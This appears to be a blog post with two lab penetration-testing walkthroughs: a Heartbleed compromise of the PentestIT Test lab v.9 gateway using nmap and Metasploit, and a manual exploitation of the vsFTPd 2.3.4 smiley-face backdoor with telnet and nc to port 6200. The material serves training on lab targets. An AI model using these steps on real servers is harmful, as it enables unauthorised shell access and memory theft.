PentestIT Test lab v.9

PentestIT Test lab v.9

 

Penetration testing laboratories “Test lab” emulate an IT infrastructure of real companies and created for a legal pentesting and improving penetration testing skills. Laboratories are always unique and contain the most recent and known vulnerabilities.

Test lab v.9 is a professional software development company, engaged in the development of various information security systems and applications, so CyBear 32C* is well protected against hacker attacks. For compromise CyBear 32C*’s corporate network attackers needs a good penetration testing skills.

Network diagram

https://lab.pentestit.ru/images/labs/TL9_map.png

To access the Internal network first we have to bypass the gateway 192.168.101.8

Nmap Scan out put

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:37 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.18s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 and 443 is not accessible with browser. and with port 8100 I could access the roundcube mail application. I tried to enumerate the application using “dirb” but not found interesting. It seems port 80 and 443 are protected by WAF. When I try  to access the port 80 every time I am getting error message. So I have added DNS name with IP in /etc/host file and then reloaded the page. It lands me correct page, tried same dirb on 80 port. Nothing has given correct information. At last try I enumerated the port 443 and noticed interesting 😉 HeartBleed vulnerability.

nmap -sV --script=ssl-heartbleed 192.168.101.8

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:58 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.17s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL 
|   cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://cvedetails.com/cve/2014-0160/
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploited the HeartBleed vulnerability usign metasploit auxiliary module “auxiliary/scanner/ssl/openssl_heartbleed “.

After exploiting the multiple time I got the inserting /var/www path. Using the same path I navigated the page and got the BYPASS token.

Advertisements

Manual vsFTPd Vulnerability Exploitation

vsftpd, (or very secure FTP daemon)  is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

nmap -p0-65535 192.168.2.129

Featured image

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a “: )” smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, someone[clarification needed] had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.

Lets try to exploit without metasploit.

Try to connect the vsFTPd server using USER  name and PASS

Note :  User name should end with smiley “: ) ” 🙂

Whenever user connect to the vsFTPd server smiley it will opens the backdoor connection and enables the port 6200 in ftp server.

root@kali:~# telnet 192.168.2.129 21
 Trying 192.168.2.129...
 Connected to 192.168.2.129.
 Escape character is '^]'.
 220 (vsFTPd 2.3.4)
 USER invalid: )
 331 Please specify the password.
 PASS dont know
 ^]
 telnet> quit
 Connection closed.

Close the telnet session and connect it back to 6200 port using netcat or telnet.

nc 192.168.2.129 6200

or

telnet 192.168.2.129 6200

It will allows the user to connect the vsFTPd server without authentication.

Featured image

Done 🙂